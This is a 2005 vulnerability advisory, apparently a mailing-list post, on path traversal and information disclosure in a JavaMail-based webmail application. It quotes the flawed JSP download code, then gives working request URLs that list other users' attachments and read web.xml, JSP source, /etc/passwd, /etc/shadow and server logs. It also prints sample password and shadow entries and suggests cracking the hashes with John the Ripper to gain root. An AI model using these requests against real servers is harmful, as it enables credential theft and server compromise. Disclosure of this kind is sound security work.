Javamail Multiple Information Disclosure Vulnerabilities

[Ricky Latt <ygnboyz () gmail com>]

Javamail Multiple Information Disclosure Vulnerabilities

May 25, 2005 Yangon, Myanmar.

Vulnerable Systems:
 * JavaMail API 1.3
 * JavaMail API 1.2
 * JavaMail API 1.1.3

Tested on Apache Tomcat/5.0.16
Possibly on all versions of Windows

Failed to restrict to accessing other directory and files in ReadMessage.jsp

File Name:<%=mp.getFileName()%><br>
                    Type: <%=abc.getContent_Type()%><br>
                    Size: <%=abc.getMsgSize()/1024%>Kb<br><a href="docdownloadfile.jsp?f=<%=abc.getFilePath() + "/" + 
abc.getFileName() %>" target="_new"> download </a><br>

<%=abc.getFilePath() + "/" + abc.getFileName() %>"

It will give attacker any file on system, because it said getFilePath() + "/" + abc.getFileName()

1. Open specific mailbox attachment
2. Download .jsp source code and configuration information of javamail
3. Target machine Root/Admin Compromise
4. Download server information

1. Open specific mailbox attachment

When user download message from Javamail domain from webmail, attacker may notice URL 
http://example.com/docdownloadfile.jsp?f=/var/serviceprovider/web/mailboxesdir/user () example 
com/messageid123@user/filename.extension

Then noticed URL lead to /var/folders so tried to switched folders.

http://example.com/var/serviceprovider/web/mailboxesdir/user () example com/messageid123@user

But got errors. So finally when reached to this URL

http://example.com/mailboxesdir/user () example com/

It’s made listing of user () example com attachments are there. 

Even unauthorized users are able to view specific mailbox attachment. Attacker need to know only username in order to 
get attachments listing. 

http://example.com/mailboxesdir/user2 () example com/

http://example.com/mailboxesdir/user3 () example com/


2. Download configuration information of javamail

And noticed that docdownloadfile.jsp redirect to where the file are located on server with the Parameter f. actually 
web browser got the redirect name 

http://example.com/Download?/var/serviceprovider/web/mailboxesdir/user () example 
com/messageid123@user/filename.extension

This information lead to get web.xml

http://example.com/Download?/var/serviceprovider/web/WEB-INF/web.xml


Which give configuration information of javamail

Download source code of jsp file
http://example.com/Download?/var/serviceprovider/web/login.jsp
http://example.com/Download?/var/serviceprovider/web/messagecontent.jsp
http://example.com/Download?/var/serviceprovider/web/addbook.jsp
http://example.com/Download?/var/serviceprovider/web/compose.jsp
http://example.com/Download?/var/serviceprovider/web/folder.jsp




3. Target machine Root/Admin Compromise

In UNIX /etc/passwd and /etc/shadow are important folder which 

A little bit curious and look in web browser typing that 
http://example.com/Download?/etc/passwd

example of such a password file is:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh

Then Crack Unix password files with John the Ripper.

John can be found practically anywhere. For example: try going to altavista.com and running a search for 'john the 
ripper'. 

http://example.com/Download?/etc/shadow

root:$1$ $WLzQjSmuxB/:133334:0:22222:7:::
adm:*:133334:0:22222:7:::
ftp:*:133334:0:2222:7:::

http://example.com/Download?/etc/group
/etc/group file:

root:x:0:
daemon:x:1:
bin:x:2:
sys:x:3:
adm:x:4:
tty:x:5:
disk:x:6:
lp:x:7:lp
mail:x:8:
news:x:9:
uucp:x:10:
proxy:x:13:


When attacker get information of root/admin user of target server and then attacker can lead to any attack. Attacker 
may do Website defacement, database altering, stealing and more.

4. Download server information

http://example.com/Download?/var/log/boot.log
http://example.com/Download?/var/log/maillog
And more can be done….

By 
Thet Aung Min Latt thetaung () gmail com
http://thetaung.amyanmar.com